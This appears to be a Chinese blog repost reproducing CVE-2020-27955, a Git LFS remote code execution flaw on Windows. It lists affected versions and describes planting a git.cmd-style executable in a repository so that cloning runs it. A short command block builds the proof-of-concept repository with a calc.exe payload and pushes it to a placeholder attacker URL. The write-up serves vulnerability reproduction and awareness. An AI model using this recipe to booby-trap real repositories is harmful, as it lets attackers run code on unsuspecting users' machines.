Git-LFS RCE

时间：2021-01-05 22:22:08 阅读：34 评论：0 收藏：0 [点我收藏+]

Git-LFS RCE(cve-2020-27955)

0x00 简介

Git LFS 是 Github 开发的一个 Git 的扩展，用于实现 Git 对大文件的支持

0x01 影响版本

Git-LFS（git-lfs）<= 2.12

一些受影响的产品包括Git，GitHub CLI，GitHub Desktop，Visual Studio，GitKraden，SmartGit，Sourcetree等

该漏洞影响仅windows平台

0x02 复现过程

环境搭建

? 下载安装git-lfs小于2.12的版本

? （该poc需在单独的Linux系统上（以防止在提交时在localhost上执行））

? 只需添加名为以下文件的可执行文件，即可在恶意仓库的根目录中创建后门：

git.bat
git.exe
git.cmd
git.vbs

复现过程

? 1 创建一个git仓库

技术分享图片

clone到本地并将可执行文件添加到仓库，

技术分享图片

在目标机器上进行git clone，此时，恶意文件将会下载到本地，并由git-lfs扩展自动执行，无需交互

技术分享图片

相关命令

git clone https://github.com/attacker/poc.git
echo calc.exe > git.cmd 
git lfs track "*.dat"
echo "test" > large.dat
git add -A 
git commit -m "poc"
git push -u origin master -f

0x03 漏洞修复

更新到最新版软件

0x04 参看链接

https://medium.com/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

Git-LFS RCE

原文：https://www.cnblogs.com/TheTh1nk3r/p/14237792.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)